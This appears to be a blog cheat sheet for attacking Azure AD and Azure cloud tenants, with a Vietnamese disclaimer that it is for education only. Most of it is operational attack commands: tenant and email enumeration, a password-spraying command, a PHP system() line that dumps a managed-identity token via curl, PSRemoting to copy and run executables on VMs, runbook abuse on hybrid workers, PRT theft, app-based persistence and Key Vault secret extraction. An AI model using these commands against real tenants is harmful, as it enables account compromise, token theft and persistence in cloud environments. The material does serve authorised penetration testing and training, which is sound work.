“Mọi kiến thức trong bài viết chỉ phục vụ mục đích giáo dục và an toàn thông tin.
Không được sử dụng để tấn công hệ thống mà bạn không sở hữu hoặc không được phép kiểm thử.”
I. Reconnaissance (external)
Update useful tool: https://github.com/nyxgeek/o365recon
Find the subdomain of the target
Using microBurst
. \Invoke-EnumerateAzureSubDomains.ps1
Invoke-EnumerateAzureSubDomains -Base <target> -Verbose
enum email:
o365creeper.py -f emails.txt -o validemails.txt
II. Reconnaissance (internal)
Using RoadTool
roadrecon auth -u <Email> -p <Password>
roadrecon gather
roadrecon gui
Using StormSpotter
python ssbackend.pyz
quasar.cmd serve -p 9091 --history
Using Bloodhound, Azurehound
. C:\AzAD\Tools\AzureHound\AzureHound.ps1
PS C:\AzAD\Tools> Invoke-AzureHound -Verbose
III. Initial attack
Brute force
MSOLSpray.ps1
PS Invoke-MSOLSpray -UserList validemails.txt -Password test -Verbose
Illicit Consent Grant attack.
Using
IV. Lateral movement
Check env command, look at IDENTITY_HEADER and IDENTITY_ENDPOINT, dump token by this code:
<?php
system('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER');
?>
Check Deployments
Get-AzResourceGroupDeployment -ResourceGroupName <Resource_group_name>
Save deployment template
Save-AzResourceGroupDeploymentTemplate -ResourceGroupName <Resource_group_name> -DeploymentName <Deployment_Name>
VM interaction:
access the VM using PSRemoting
$password = ConvertTo-SecureString 'testpassword' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential('testuser', $password)
$sess = New-PSSession -ComputerName <IP> -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
Enter-PSSession -Session $sess
Transfer file:
Copy-Item -ToSession $sess -Path tests.exe -Destination C:\Users\ –Verbose
Excute a command:
Invoke-Command -Session $sess -ScriptBlock{ls C:\Users\}
Using hybridworker
List Automation Hybrid Wordker Group
Get-AzAutomationHybridWorkerGroup -AutomationAccountName <> -ResourceGroupName
Import-AzAutomationRunbook -Name studentx -Path C:\AzAD\Tools\studentx.ps1 -AutomationAccountName HybridAutomation -ResourceGroupName Engineering -Type PowerShell -Force -Verbose
Publish-AzAutomationRunbook -RunbookName studentx -AutomationAccountName HybridAutomation -ResourceGroupName Engineering -Verbose
Start-AzAutomationRunbook -RunbookName studentx -RunOn Workergroup1 -AutomationAccountName HybridAutomation -ResourceGroupName Engineering -Verbose
Dump PRT
Using PRT in chrome
Abuse Dynamic group
Abuse proxy application
Check azure connect, authentication type
Get-ADSyncConnector
Cloud to On-prem:
abuse PTA,
obtain PRT cookie
Readmore: https://stealthbits.com/blog/lateral-movement-to-the-cloud-pass-the-prt/
Global Administrator or Intune Administrator role can execute
PowerShell scripts on an enrolled Windows device
On-prem to Cloud:
abuse PHS
V. Persistence
Add a new application that has high permissions and then use that for persistence
Useful command:
Login:
az login -u test@test.onmicrosoft.com -p testpassword
$passwd = ConvertTo-SecureString "testpassword" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential("test@test.onmicrosoft.com", $passwd)
Connect-AzureAD -Credential $creds
Azurehound
$passwd = ConvertTo-SecureString "testpassword" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential("test@test.onmicrosoft.com", $passwd)
Connect-AzAccount -Credential $creds
Connect-AzureAD -Credential $creds
.\AzureHound.ps1
Invoke-AzureHound -Verbose
Get all users
Get-AzureADUser -All $true
Get-AzureADUser -All $true | select UserPrincipalName => only get only UPNs
Show GAs
Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Administrator'" | Get-AzureADDirectoryRoleMember
List all custom directory roles:
Import-Module AzureADPreview\AzureADPreview.psd1
$passwd = ConvertTo-SecureString "testpassword" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential("test@test.com",$passwd)
Connect-AzureAD -Credential $creds
Get-AzureADMSRoleDefinition | ?{$_.IsBuiltin -eq $False} |select DisplayName
List resource (AzAD)
Get-AzResource
Get all the role assignments for the test user
Get-AzRoleAssignment -SignInName test@test.onmicrosoft.com
Get-AzRoleAssignment -Scope <Scope>
Check the definition of this role
Get-AzRoleDefinition -Name <Role_name>
List all the VMs where the current user has at least the Reader role
Get-AzVM | fl
or
az vm list
List all App Services. We filter on the bases of ‘Kind’ proper otherwise both appservices and function
apps are listed
Get-AzWebApp | ?{$_.Kind -notmatch "functionapp"}
az webapp list (list web app service)
az webapp list --query "[].[name]" -o table (List only the names of app services)
To list Function Apps
Get-AzFunctionApp
list storage accounts
Get-AzStorageAccount | fl
az storage account list
is the readable keyvaults for the current user
Get-AzKeyVaultaz keyvault listGet-AzKeyVaultSecret -VaultName
Get-AzKeyVaultSecret -VaultName <VaultName> -Name <Container_name> –AsPlainText
Check if there is a user logged-in to az cli on that machine
az ad signed-in-user show
Check if there is a public IP address attached to the VM
Get-AzVM -Name <VM_name> -ResourceGroupName <Resource_name> | select -ExpandProperty NetworkProfile
Get more details about the network interface attached to the VM using the below command
Get-AzNetworkInterface -Name <VM_interface>
Get the public IP address attached to the VM
Get-AzPublicIpAddress -Name <IP_name>
Get AzVM
Get-AzVM -Name <VM_name> -ResourceGroupName <Resource_group_name> | fl *
Get information of the group and list principles
Get-AzADGroup -DisplayName <Group_name>
Enumerate the service principals in Azure AD and check the service principal that the AppID xx belong to
Get-AzureADServicePrincipal -All $True | ?{$_.AppId -eq "<App_id>"} | fl
Disconnect
Disconnect-AzAccount
Check if any extensions is already installed
Get-AzVMExtension -ResourceGroupName "Research" -VMName <VMName>
Run powershell on the VM from the powershell file
Invoke-AzVMRunCommand -VMName <VMName> -ResourceGroupName <ResourceGroupName> -CommandId 'RunPowerShellScript' -ScriptPath 'test.ps1' -Verbose
Nhat Truong Blog 